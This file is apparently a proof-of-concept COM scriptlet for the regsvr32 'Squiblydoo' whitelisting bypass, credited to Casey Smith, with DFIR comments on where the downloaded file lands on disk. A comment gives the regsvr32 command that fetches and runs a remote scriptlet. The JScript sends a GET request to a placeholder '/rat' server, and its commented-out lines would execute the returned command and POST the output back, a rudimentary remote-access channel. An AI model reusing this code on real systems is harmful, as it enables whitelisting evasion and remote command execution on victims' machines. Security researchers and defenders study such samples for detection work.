<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
	<!-- DFIR -->
	<!--		.sct files are downloaded and executed from a path like this -->
	<!-- Though, the name and extension are arbitary.. -->
	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
	
	
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
		<![CDATA[
	
	
	w = new ActiveXObject("WScript.Shell");
	//v = w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer");
	//q = v.split("=")[1].split(";")[0];
	h = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
	//h.SetProxy(2,q);
	h.Open("GET","http://'+$Server+'/rat",false);
	h.Send();
	//c = h.ResponseText;
	//r = new ActiveXObject("WScript.Shell").Exec(c);
	//var so;
	//while(!r.StdOut.AtEndOfStream){so=r.StdOut.ReadAll()}
	//p = new ActiveXObject("WinHttp.WinHttpRequest.5.1");														
	//p.SetProxy(2,q);
	//p.Open("POST","http://'+$Server+'/rat",false);
	//p.Send(so);

		]]>
	</script>
</registration>
